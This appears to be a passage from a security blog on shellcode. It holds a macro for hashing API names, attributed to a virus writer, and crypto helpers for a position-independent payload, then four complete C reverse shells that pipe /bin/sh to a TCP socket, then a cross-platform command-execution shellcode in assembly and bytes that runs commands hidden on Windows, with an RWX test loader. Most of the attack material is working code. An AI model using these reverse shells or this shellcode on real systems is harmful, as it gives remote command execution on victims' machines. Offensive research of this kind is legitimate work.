link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
rem Presumably dumps the .text section of spz.exe as the raw PIC -- TODO confirm.
xbin spz.exe .text
del *.obj

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro for example is from a virus writer Vecna and based on algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

; hash_string s
; Computes a 32-bit hash of the text argument at assembly time and
; leaves it in the assembler symbol 'hash' ('len' and 'i' are also set).
; For every character except the first and the last:
;     hash = rol32(hash, 7) xor character
; The first and last characters are skipped -- presumably they are the
; quotes or delimiters around the string as passed in; verify at call sites.
hash_string macro s
  hash = 0
  len  = 0

  ; first pass: count the characters of the argument
  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  ; second pass: fold in every character but the first and last
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        ; rotate left by 7 within 32 bits, then mix in the character
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

The public key cryptography we’re mostly familiar with today use big number libraries to perform computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only uses modular arithmetic which requires large keys but requires the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code as much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding value to itself. 😉

Authenticated Encryption

It would appear using AEAD (Authenticated Encryption Associated Data) for packet encryption will become a standard eventually. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96-bits provides integrity of encrypted packets. The hash is appended to end of 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate the MAC and compare it with the 96 bits we’ve received. If they match, we can presume it was sent by a trusted party.

/**F*********************************************
 *
 * Compute the MAC for an SPP packet
 *
 * x     : global memory; supplies the MAC key
 *         (v.tek.mkey) and the data (v.blk.buf)
 * inlen : number of bytes of v.blk.buf to cover
 * out   : receives the first SPP_MAC_LEN bytes of
 *         SHA3-256(mkey || data)
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  BYTE     digest[SHA3_256];
  SHA3_CTX sha;
  
  // key first, then the packet data
  SHA3_Init(&sha, SHA3_256);
  SHA3_Update(&sha, x->v.tek.mkey, SPP_MKEY_LEN);
  SHA3_Update(&sha, x->v.blk.buf, inlen);
  SHA3_Final(digest, &sha);
  
  // hand back only the truncated digest
  memcpy(out, digest, SPP_MAC_LEN);
}

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out up to 50-60% of code can be reduced when PIC is written in pure assembly and so it’s not obsolete just yet!

I hope based on sources, more research will be done into using C for writing PICs and that it is more appealing than writing in pure assembly.

See sources here

Posted in assembly, cryptography, diffie hellman merkle, networking, programming, public key exchange, security, shellcode, windows | Tagged , , , , , , , | 1 Comment

Basic shells for Linux and BSD

Introduction

Here are 4 examples of how to spawn a shell on Linux, BSD and Mac OSX for the purpose of accepting commands and sending the output over TCP. I do not use TTY or PTY shells here for this because the intended purpose of the C code was to eventually convert into assembly and for that reason alone, it made sense to keep everything simple.

If you just want to examine code in detail yourself, see here.

Simple reverse connect

The most simple of all which you’ve no doubt seen many times before.

/*
 * Simple reverse connect: connect to ip:1234, attach the socket to
 * stdin/stdout/stderr and replace this process with /bin/sh.
 * Returns non-zero if the socket, the connection or execve fails.
 */
int main(void)
{
    struct sockaddr_in sa;
    /* 127.0.0.1 as it is laid out in memory on a little-endian host.
       in_addr_t is 4 bytes everywhere, whereas u_long is 8 bytes on
       LP64 systems and would be copied past the end of sin_addr. */
    in_addr_t   ip=0x0100007F;
    char        *argv[2];
    int         s;
    
    // create a socket
    s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (s < 0) return 1;
    
    // clear padding (and sin_len on BSD) before filling in the address
    memset (&sa, 0, sizeof(sa));
    sa.sin_family      = AF_INET;
    sa.sin_port        = htons(1234);
    sa.sin_addr.s_addr = ip;
    
    // attempt connection to remote host
    if (connect(s, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
      close(s);
      return 1;
    }
    
    // use socket for input/output
    dup2(s, STDIN_FILENO );
    dup2(s, STDOUT_FILENO);
    dup2(s, STDERR_FILENO);
    
    argv[0]="/bin/sh";
    argv[1]=NULL;
    
    // execute sh
    execve("/bin/sh", argv, NULL);
    
    // only reached when execve failed
    close(s);
    return 1;
}

The problem with this code is that we can’t manipulate the data transferred between 2 hosts. Smallest code generated, easiest to write but very limited.

select

To solve problem of manipulating data we can use synchronization. The select function is widely available and not that difficult to implement as assembly if we use bit testing instructions.

/*
 * Reverse shell using select(): /bin/sh runs as a child connected
 * through two pipes, and the parent relays data between the pipes and
 * a TCP connection to ip:1234 so it can inspect or transform it.
 */
int main(void)
{
    struct sockaddr_in sa;
    /* 127.0.0.1 in memory order on a little-endian host; in_addr_t is
       always 4 bytes, unlike u_long which is 8 bytes on LP64 */
    in_addr_t   ip=0x0100007F;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    int         r, s, nfds;
    fd_set      fds;
    
    // create pipes for redirection of stdin/stdout/stderr
    if (pipe(in) < 0) return 1;
    if (pipe(out) < 0) {
      close(in[0]);
      close(in[1]);
      return 1;
    }

    // create /bin/sh as child process
    pid=fork();
    
    // without this check a failed fork would fall into the parent
    // branch and end in kill(-1, ...), signalling every process
    if (pid < 0) {
      close(in[0]);
      close(in[1]);
      close(out[0]);
      close(out[1]);
      return 1;
    }
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
      // execve failed: leave the child without running parent cleanup
      _exit(127);
    }
    
    // parent keeps the write end of 'in' and the read end of 'out'
    close(in[0]);
    close(out[1]);
    
    // create a socket
    s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    
    if (s >= 0) {
      memset (&sa, 0, sizeof(sa));
      sa.sin_family      = AF_INET;
      sa.sin_port        = htons(1234);
      sa.sin_addr.s_addr = ip;
      
      // attempt connection to remote host; FD_SET on a descriptor
      // at or above FD_SETSIZE is undefined, so refuse to relay then
      if (connect(s, (struct sockaddr*)&sa, sizeof(sa)) == 0 &&
          s < FD_SETSIZE && out[0] < FD_SETSIZE)
      {
        nfds = (s > out[0] ? s : out[0]) + 1;
        
        for (;;)
        {
          FD_ZERO(&fds);
          FD_SET(s, &fds);
          FD_SET(out[0], &fds);
          
          r=select(nfds, &fds, 0, 0, 0);
          if (r<0) break;
          
          // remote host -> shell stdin
          if (FD_ISSET(s, &fds)) {
            r=read (s, buf, BUFSIZ);
            if (r<=0) break;
            if (write(in[1], buf, r) < 0) break;
          }
          // shell stdout/stderr -> remote host
          if (FD_ISSET(out[0], &fds)) {
            r=read (out[0], buf, BUFSIZ);
            if (r<=0) break;
            if (write(s, buf, r) < 0) break;
          }
        }
      }
      close(s);
    }
    // SIGCHLD is ignored by default and would leave the shell
    // running; ask it to terminate instead
    kill(pid, SIGTERM);
    
    close(in[1]);
    close(out[0]);
    
    return 0;
}

The problem is that if executed on system with thousands of handles opened, this is unreliable.

epoll

Designed specifically to replace select, we can poll for events on socket or other handles associated with shell.

/*
 * Reverse shell using epoll (Linux): /bin/sh runs as a child connected
 * through two pipes, and the parent relays data between the pipes and
 * a TCP connection to ip:1234.
 */
int main(void)
{
    struct sockaddr_in sa;
    /* 127.0.0.1 in memory order on a little-endian host; in_addr_t is
       always 4 bytes, unlike u_long which is 8 bytes on LP64 */
    in_addr_t   ip=0x0100007F;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    
    int         efd, end, len, i, r, s, h[2];
    struct      epoll_event evt;
    struct      epoll_event evts[1];
    
    // create pipes for redirection of stdin/stdout/stderr
    if (pipe(in) < 0) return 1;
    if (pipe(out) < 0) {
      close(in[0]);
      close(in[1]);
      return 1;
    }

    // create /bin/sh as child process
    pid=fork();
    
    // without this check a failed fork would fall into the parent
    // branch and end in kill(-1, ...), signalling every process
    if (pid < 0) {
      close(in[0]);
      close(in[1]);
      close(out[0]);
      close(out[1]);
      return 1;
    }
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
      // execve failed: leave the child without running parent cleanup
      _exit(127);
    }
    
    // parent keeps the write end of 'in' and the read end of 'out'
    close(in[0]);
    close(out[1]);
    
    // create a socket
    s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    
    if (s >= 0) {
      memset (&sa, 0, sizeof(sa));
      sa.sin_family      = AF_INET;
      sa.sin_port        = htons(1234);
      sa.sin_addr.s_addr = ip;

      // attempt connection to remote host; 0 is a valid descriptor,
      // so only a negative epoll_create1 result is an error
      if (connect(s, (struct sockaddr*)&sa, sizeof(sa)) == 0 &&
          (efd=epoll_create1(0)) >= 0)
      {
        h[0] = s;
        h[1] = out[0];
        
        // add 2 descriptors to monitor
        for (i=0; i<2; i++)
        {
          memset (&evt, 0, sizeof(evt));
          evt.data.fd = h[i];
          // level-triggered: each event is served by a single read,
          // so any data left over must raise another event
          evt.events  = EPOLLIN;
          
          epoll_ctl(efd, EPOLL_CTL_ADD, h[i], &evt);
        }
          
        // now loop until user exits or some other error
        for (end=0; !end;)
        {
          r=epoll_wait(efd, evts, 1, -1);
          
          if (r<0) {
            break;
          }
          
          for (i=0; i<r; i++) 
          {
            // read is available? served before the hang-up check so
            // output still queued by an exiting shell is delivered
            if (evts[i].events & EPOLLIN) 
            {
              // socket?
              if (evts[i].data.fd == s)
              {
                len=read(s, buf, BUFSIZ);
                // 0 is end of stream, negative is an error
                if (len<=0 || write(in[1], buf, len) < 0) end=1;
              } else {
                // stdout/stderr
                len=read(out[0], buf, BUFSIZ);
                if (len<=0 || write(s, buf, len) < 0) end=1;
              }
            } else
            // disconnection/error?
            if (evts[i].events & (EPOLLERR | EPOLLHUP)) 
            {
              end=1;
            }
          }
        }
        close(efd);
      }
      close(s);
    }
    // SIGCHLD is ignored by default and would leave the shell
    // running; ask it to terminate instead
    kill(pid, SIGTERM);
    
    close(in[1]);
    close(out[0]);
    
    return 0;
}

kqueue on BSD/OSX

kqueue was originally developed by Jonathan Lemon for FreeBSD in 2000 and has since been ported to other operating systems.

It arrived on the scene before epoll did.

// Reverse-shell relay using kqueue.
//
// Spawns /bin/sh with its stdin/stdout/stderr attached to two pipes,
// connects to 127.0.0.1:1234 and shuttles data between the socket and
// the pipes until either side reports an error or end-of-file.
// Always returns 0.
int main(void)
{
    struct sockaddr_in sa;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    
    int         s, i, end, kq, nev, src, dst;
    ssize_t     len;
    struct kevent fdlist[2];
    struct kevent evlist[2];
    
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // create /bin/sh as child process
    pid=fork();
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
    } else {      
      close(in[0]);
      close(out[1]);
      
      // create a socket
      s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      // zero the whole structure first so sin_len/sin_zero are not
      // stack garbage, then fill in only the 4-byte address field
      memset(&sa, 0, sizeof(sa));
      sa.sin_family      = AF_INET;
      sa.sin_port        = htons(1234);
      sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);   // 127.0.0.1
      
      // attempt connection to remote host
      // (a failed connect surfaces below as a failed read on s)
      connect(s, (struct sockaddr*)&sa, sizeof(sa));
      
      // create new kernel event queue; kqueue() returns -1 on failure
      if ((kq = kqueue()) >= 0) {
        
        // initialize structure
        EV_SET(&fdlist[0], s, EVFILT_READ, 
            EV_ADD | EV_ENABLE | EV_CLEAR, 0, 0, 0);
            
        EV_SET(&fdlist[1], out[0], EVFILT_READ, 
            EV_ADD | EV_ENABLE | EV_CLEAR, 0, 0, 0);
        
        for (end=0;!end;)
        {
          nev=kevent(kq, fdlist, 2, evlist, 2, NULL);
          
          // stop on error instead of spinning on a failing kevent()
          if (nev < 0) {
            break;
          }
          
          for (i=0; i<nev && !end; i++)
          {
            if (evlist[i].flags & EV_ERROR) {
              end=1;
              break;
            }
            
            // pick the direction: socket -> shell stdin,
            // shell stdout/stderr -> socket
            if (evlist[i].ident == (uintptr_t)s) {
              src=s;
              dst=in[1];
            } else if (evlist[i].ident == (uintptr_t)out[0]) {
              src=out[0];
              dst=s;
            } else {
              continue;
            }
            
            len=read(src, buf, sizeof(buf));
            
            // 0 = peer closed, <0 = error: never hand that to write()
            if (len <= 0 || write(dst, buf, (size_t)len) < 0) {
              end=1;
            } else if (evlist[i].flags & EV_EOF) {
              // forward what was still pending, then stop
              end=1;
            }
          }
        }
        close(kq);
      }
      // NOTE(review): SIGCHLD is ignored by default, so this does not
      // terminate the shell; closing in[1] below is what ends it.
      kill(pid, SIGCHLD);
      close(s);
    }
    close(in[1]);
    close(out[0]);
    
    return 0;
}

Summary

I haven’t seen any shellcodes that use kqueue, epoll or even select but then maybe they’re not necessary.

Posted in assembly, bsd, linux, networking, openbsd, security, shellcode | Leave a comment

Shellcode: Execute command for x32/x64 Linux / Windows / BSD

Introduction

I was hoping to present here a code that would execute perfectly on 32/64-bit Linux/BSD and Windows systems derived from code discussed here

The 64-bit code will execute on all 3 systems but not 32-bit versions of BSD because the system call convention and numbers are different to 32-bit versions of Linux which could be updated but how many systems still run 32-bit? Less than 10%?

Detection

wos attempts to identify an OS running on x86 using some simple checks of segment registers, stack pointer, errors returned by system calls. It hasn’t been tested extensively but feel free to try out on some x86 based system and tell me what results you get.

It works from Windows NT up to Windows 10, Linux, FreeBSD, OpenBSD, OSX and Solaris x86.

The following isn’t entirely optimized although the windows code is derived from code by Peter Ferrie here.

Just to note, any command executed on Windows systems will be hidden.

;  Execute a command
;  Works on 32/64-bit versions of Windows and Linux
;
;  yasm -fbin exec.asm -oexec.bin
;  nasm -fbin exec.asm -oexec.bin
;
;  194 bytes
;
;  One byte stream is executed in either 32-bit or 64-bit mode. The
;  one-byte inc/dec opcodes (0x40-0x4F) are REX prefixes in 64-bit mode,
;  which is what the mode checks below rely on.
;
;  Data expected directly after the final call instruction:
;    <command> 0xFF "-c" 0xFF "/bin//sh" 0
;  The 0xFF bytes are replaced with zero terminators at run time and the
;  immediate of "mov cl, 7" has to match the length of <command>.
;
    bits    32
    
    push    esi               ; preserve callee-saved registers,
    push    edi               ; restored at cmd_end
    push    ebx
    push    ebp
    
    xor     ecx, ecx          ; ecx=0
    mul     ecx               ; eax=0, edx=0
    
    push    eax
    push    eax
    push    eax
    push    eax
    push    eax               ; setup homespace for win64
    jmp     l_sb              ; load command
    
get_os:
    pop     edi               ; edi=cmd, argv
    mov     cl, 7             ; ecx=length of command (7 = "notepad")
    ; initialize cmd/argv regardless of OS
    push    eax               ; argv[3]=NULL;
    push    edi               ; argv[2]=cmd
    repnz   scasb             ; skip command line (al=0, stops when ecx=0)
    stosb                     ; zero terminate
    push    edi               ; argv[1]="-c", 0
    scasw                     ; skip option
    stosb                     ; zero terminate
    push    edi               ; argv[0]="/bin//sh", 0
    push    esp               ; save argv
    push    edi               ; save pointer to "/bin//sh", 0
    
    mov     al, 6             ; eax=sys_close for Linux/BSD
    inc     ecx               ; 32-bit: ecx=1; 64-bit: REX prefix, ecx stays 0
    jecxz   gos_x64           ; if ecx==0 we're 64-bit
    
    ; we're 32-bit
    ; if gs is zero, we're native 32-bit windows
    mov     cx, gs
    jecxz   win_cmd
    
    ; if eax is zero after right shift of SP, ASSUME we're on windows
    push    esp
    pop     eax
    shr     eax, 24           ; upper 24 bits of eax are zero from here on
    jz      win_cmd
    
    ; we're 32-bit Linux
    mov     al, 11            ; eax=sys_execve
    pop     ebx               ; ebx="/bin//sh", 0
    pop     ecx               ; ecx=argv
    int     0x80              ; edx=envp=0 (from mul above)
    
    ; we're 64-bit, execute syscall and see what
    ; error returned
gos_x64:
    push    -1
    pop     edi               ; rdi=-1, deliberately invalid argument
    syscall                   ; eax=6 (set above)
    cmp     al, 5             ; Access Violation indicates windows
    push    59
    pop     eax               ; eax=sys_execve; push/pop keep the flags
    cdq                       ; edx=0, flags still from cmp
    jz      win_cmd
    
    pop     edi              ; rdi="/bin//sh", 0
    pop     esi              ; rsi=argv
    syscall
l_sb:
    jmp     ld_cmd
    ; following code is derived from Peter Ferrie's calc shellcode
    ; i've modified it to execute commands
win_cmd:
    ; unwind the six values pushed in get_os, keeping only cmd
    pop     eax               ; eax="/bin//sh", 0
    pop     eax               ; eax=argv
    pop     eax               ; eax="/bin//sh", 0
    pop     eax               ; eax="-c", 0
    pop     ecx               ; ecx=cmd
    pop     eax               ; eax=0
    
    inc     eax               ; 32-bit: eax=1, ZF=0; 64-bit: REX prefix, ZF kept
    xchg    edx, eax          ; 32-bit: edx=1, eax=0
    jz      x64               ; ZF is still set from "cmp al, 5" on the 64-bit path

    push    eax               ; will hide
    push    ecx               ; cmd
    
    mov     esi, [fs:edx+2fh] ; edx=1, so this reads fs:[30h]
    mov     esi, [esi+0ch]
    mov     esi, [esi+0ch]
    lodsd
    mov     esi, [eax]
    mov     edi, [esi+18h]    ; edi=module base used for the export lookup
    mov     dl, 50h           ; 50h+28h=78h, offset used at lqe for 32-bit images
    jmp     lqe
    bits 64
x64:
    mov     dl, 60h           ; rdx=60h; 60h+28h=88h, offset used at lqe for 64-bit images
    mov     rsi, [gs:rdx]
    mov     rsi, [rsi+18h]
    mov     rsi, [rsi+10h]
    lodsq
    mov     rsi, [rax]
    mov     rdi, [rsi+30h]    ; rdi=module base used for the export lookup
    ; from here on the code is shared: in 32-bit mode every REX.W prefix
    ; executes as "dec eax", which is harmless because eax is reloaded
lqe:
    add     edx, [rdi+3ch]    ; edx += dword at base+3ch
    mov     ebx, [rdi+rdx+28h] ; ebx=RVA of the table walked below
    mov     esi, [rdi+rbx+20h] ; esi=RVA of name pointer array
    add     rsi, rdi
    mov     edx, [rdi+rbx+24h] ; edx=RVA of 16-bit index array
fwe:
    movzx   ebp, word [rdi+rdx] ; ebp=index belonging to the current name
    lea     rdx, [rdx+2]      ; advance without touching flags
    lodsd                     ; eax=RVA of next name
    cmp     dword [rdi+rax], 'WinE' ; name starts with "WinE"?
    jne     fwe
    
    mov     esi, [rdi+rbx+1ch] ; esi=RVA of address array
    add     rsi, rdi
    
    mov     esi, [rsi+rbp*4]
    add     rdi, rsi          ; rdi=address of the matched function
    cdq                       ; edx=0 when eax (the name RVA) is non-negative
    call    rdi
cmd_end:
    bits    32
    ; drop the five zero slots pushed at entry, then restore registers
    pop     eax
    pop     eax
    pop     eax
    pop     eax
    pop     eax
    pop     ebp
    pop     ebx
    pop     edi
    pop     esi
    ret
ld_cmd:
    call   get_os             ; pushes the address of the data that follows
    ; place command here
    ;db     "notepad", 0xFF
    ; do not change anything below  
    ;db      "-c", 0xFF, "/bin//sh", 0

Test Unit

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#if defined (_WIN32) || defined(_WIN64)
#define WIN
#include <windows.h>
#else
#include <sys/mman.h>
#endif

#define CMD_LEN_OFS 0x10+1
#define EXEC_SIZE 194

// Assembled bytes of exec.asm, shown with a 32-bit disassembly.
// Offsets 0x68-0xB2 are written as 64-bit code in exec.asm, so in this
// 32-bit listing every 0x48 (REX.W) prefix appears as "dec eax".
// The immediate of "mov cl" (offset 0x11) is zero here; xcode() stores
// the command length there before the code is executed.
char exec[]= {
  /* 0000 */ "\x56"                         /* push esi                        */
  /* 0001 */ "\x57"                         /* push edi                        */
  /* 0002 */ "\x53"                         /* push ebx                        */
  /* 0003 */ "\x55"                         /* push ebp                        */
  /* 0004 */ "\x31\xc9"                     /* xor ecx, ecx                    */
  /* 0006 */ "\xf7\xe1"                     /* mul ecx                         */
  /* 0008 */ "\x50"                         /* push eax                        */
  /* 0009 */ "\x50"                         /* push eax                        */
  /* 000A */ "\x50"                         /* push eax                        */
  /* 000B */ "\x50"                         /* push eax                        */
  /* 000C */ "\x50"                         /* push eax                        */
  /* 000D */ "\xeb\x37"                     /* jmp 0x46                        */
  /* 000F */ "\x5f"                         /* pop edi                         */
  /* 0010 */ "\xb1\x00"                     /* mov cl, 0x0                     */
  /* 0012 */ "\x50"                         /* push eax                        */
  /* 0013 */ "\x57"                         /* push edi                        */
  /* 0014 */ "\xf2\xae"                     /* repne scasb                     */
  /* 0016 */ "\xaa"                         /* stosb                           */
  /* 0017 */ "\x57"                         /* push edi                        */
  /* 0018 */ "\x66\xaf"                     /* scasw                           */
  /* 001A */ "\xaa"                         /* stosb                           */
  /* 001B */ "\x57"                         /* push edi                        */
  /* 001C */ "\x54"                         /* push esp                        */
  /* 001D */ "\x57"                         /* push edi                        */
  /* 001E */ "\xb0\x06"                     /* mov al, 0x6                     */
  /* 0020 */ "\x41"                         /* inc ecx                         */
  /* 0021 */ "\xe3\x12"                     /* jecxz 0x35                      */
  /* 0023 */ "\x66\x8c\xe9"                 /* mov cx, gs                      */
  /* 0026 */ "\xe3\x20"                     /* jecxz 0x48                      */
  /* 0028 */ "\x54"                         /* push esp                        */
  /* 0029 */ "\x58"                         /* pop eax                         */
  /* 002A */ "\xc1\xe8\x18"                 /* shr eax, 0x18                   */
  /* 002D */ "\x74\x19"                     /* jz 0x48                         */
  /* 002F */ "\xb0\x0b"                     /* mov al, 0xb                     */
  /* 0031 */ "\x5b"                         /* pop ebx                         */
  /* 0032 */ "\x59"                         /* pop ecx                         */
  /* 0033 */ "\xcd\x80"                     /* int 0x80                        */
  /* 0035 */ "\x6a\xff"                     /* push 0xffffffff                 */
  /* 0037 */ "\x5f"                         /* pop edi                         */
  /* 0038 */ "\x0f\x05"                     /* syscall                         */
  /* 003A */ "\x3c\x05"                     /* cmp al, 0x5                     */
  /* 003C */ "\x6a\x3b"                     /* push 0x3b                       */
  /* 003E */ "\x58"                         /* pop eax                         */
  /* 003F */ "\x99"                         /* cdq                             */
  /* 0040 */ "\x74\x06"                     /* jz 0x48                         */
  /* 0042 */ "\x5f"                         /* pop edi                         */
  /* 0043 */ "\x5e"                         /* pop esi                         */
  /* 0044 */ "\x0f\x05"                     /* syscall                         */
  /* 0046 */ "\xeb\x75"                     /* jmp 0xbd                        */
  /* 0048 */ "\x58"                         /* pop eax                         */
  /* 0049 */ "\x58"                         /* pop eax                         */
  /* 004A */ "\x58"                         /* pop eax                         */
  /* 004B */ "\x58"                         /* pop eax                         */
  /* 004C */ "\x59"                         /* pop ecx                         */
  /* 004D */ "\x58"                         /* pop eax                         */
  /* 004E */ "\x40"                         /* inc eax                         */
  /* 004F */ "\x92"                         /* xchg edx, eax                   */
  /* 0050 */ "\x74\x16"                     /* jz 0x68                         */
  /* 0052 */ "\x50"                         /* push eax                        */
  /* 0053 */ "\x51"                         /* push ecx                        */
  /* 0054 */ "\x64\x8b\x72\x2f"             /* mov esi, [fs:edx+0x2f]          */
  /* 0058 */ "\x8b\x76\x0c"                 /* mov esi, [esi+0xc]              */
  /* 005B */ "\x8b\x76\x0c"                 /* mov esi, [esi+0xc]              */
  /* 005E */ "\xad"                         /* lodsd                           */
  /* 005F */ "\x8b\x30"                     /* mov esi, [eax]                  */
  /* 0061 */ "\x8b\x7e\x18"                 /* mov edi, [esi+0x18]             */
  /* 0064 */ "\xb2\x50"                     /* mov dl, 0x50                    */
  /* 0066 */ "\xeb\x17"                     /* jmp 0x7f                        */
  /* 0068 */ "\xb2\x60"                     /* mov dl, 0x60                    */
  /* 006A */ "\x65\x48"                     /* dec eax                         */
  /* 006C */ "\x8b\x32"                     /* mov esi, [edx]                  */
  /* 006E */ "\x48"                         /* dec eax                         */
  /* 006F */ "\x8b\x76\x18"                 /* mov esi, [esi+0x18]             */
  /* 0072 */ "\x48"                         /* dec eax                         */
  /* 0073 */ "\x8b\x76\x10"                 /* mov esi, [esi+0x10]             */
  /* 0076 */ "\x48"                         /* dec eax                         */
  /* 0077 */ "\xad"                         /* lodsd                           */
  /* 0078 */ "\x48"                         /* dec eax                         */
  /* 0079 */ "\x8b\x30"                     /* mov esi, [eax]                  */
  /* 007B */ "\x48"                         /* dec eax                         */
  /* 007C */ "\x8b\x7e\x30"                 /* mov edi, [esi+0x30]             */
  /* 007F */ "\x03\x57\x3c"                 /* add edx, [edi+0x3c]             */
  /* 0082 */ "\x8b\x5c\x17\x28"             /* mov ebx, [edi+edx+0x28]         */
  /* 0086 */ "\x8b\x74\x1f\x20"             /* mov esi, [edi+ebx+0x20]         */
  /* 008A */ "\x48"                         /* dec eax                         */
  /* 008B */ "\x01\xfe"                     /* add esi, edi                    */
  /* 008D */ "\x8b\x54\x1f\x24"             /* mov edx, [edi+ebx+0x24]         */
  /* 0091 */ "\x0f\xb7\x2c\x17"             /* movzx ebp, word [edi+edx]       */
  /* 0095 */ "\x48"                         /* dec eax                         */
  /* 0096 */ "\x8d\x52\x02"                 /* lea edx, [edx+0x2]              */
  /* 0099 */ "\xad"                         /* lodsd                           */
  /* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */
  /* 00A1 */ "\x75\xee"                     /* jnz 0x91                        */
  /* 00A3 */ "\x8b\x74\x1f\x1c"             /* mov esi, [edi+ebx+0x1c]         */
  /* 00A7 */ "\x48"                         /* dec eax                         */
  /* 00A8 */ "\x01\xfe"                     /* add esi, edi                    */
  /* 00AA */ "\x8b\x34\xae"                 /* mov esi, [esi+ebp*4]            */
  /* 00AD */ "\x48"                         /* dec eax                         */
  /* 00AE */ "\x01\xf7"                     /* add edi, esi                    */
  /* 00B0 */ "\x99"                         /* cdq                             */
  /* 00B1 */ "\xff\xd7"                     /* call edi                        */
  /* 00B3 */ "\x58"                         /* pop eax                         */
  /* 00B4 */ "\x58"                         /* pop eax                         */
  /* 00B5 */ "\x58"                         /* pop eax                         */
  /* 00B6 */ "\x58"                         /* pop eax                         */
  /* 00B7 */ "\x58"                         /* pop eax                         */
  /* 00B8 */ "\x5d"                         /* pop ebp                         */
  /* 00B9 */ "\x5b"                         /* pop ebx                         */
  /* 00BA */ "\x5f"                         /* pop edi                         */
  /* 00BB */ "\x5e"                         /* pop esi                         */
  /* 00BC */ "\xc3"                         /* ret                             */
  /* 00BD */ "\xe8\x4d\xff\xff\xff"         /* call 0xf                        */
};

// Dump len bytes of bin to "sh_cmd.bin" in the current directory.
// Nothing is written (and nothing is reported) if the file can't be opened.
void bin2file (uint8_t bin[], size_t len)
{
  FILE *fp;
  
  fp = fopen ("sh_cmd.bin", "wb");
  if (fp == NULL) {
    return;
  }
  
  fwrite (bin, 1, len, fp);
  fclose (fp);
}
// Allocate read/write/executable memory, build the final payload in it
// and run it.
//
//   code, code_len : the position-independent code to execute
//   cmd,  cmd_len  : command line appended after the code (not copied
//                    with a terminator; the code terminates it itself)
//
// Layout written to the buffer:
//   [code][cmd][0xFF "-c" 0xFF "/bin//sh" 0]
// The byte at CMD_LEN_OFS inside the code is overwritten with cmd_len,
// so cmd_len must fit in 8 bits. The payload is also saved via
// bin2file() before it runs.
void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len)
{
  void    *bin;
  uint8_t *p;
  char    args[]="\xFF-c\xFF/bin//sh\x00";
  size_t  total_len, arg_len;
  
  arg_len   = strlen(args) + 1;
  total_len = code_len + cmd_len + arg_len;
  
  printf ("[ executing code...\n");
    
#ifdef WIN
  bin=VirtualAlloc (0, total_len, 
    MEM_COMMIT, PAGE_EXECUTE_READWRITE);
#else
  bin=mmap (0, total_len, 
    PROT_EXEC | PROT_WRITE | PROT_READ, 
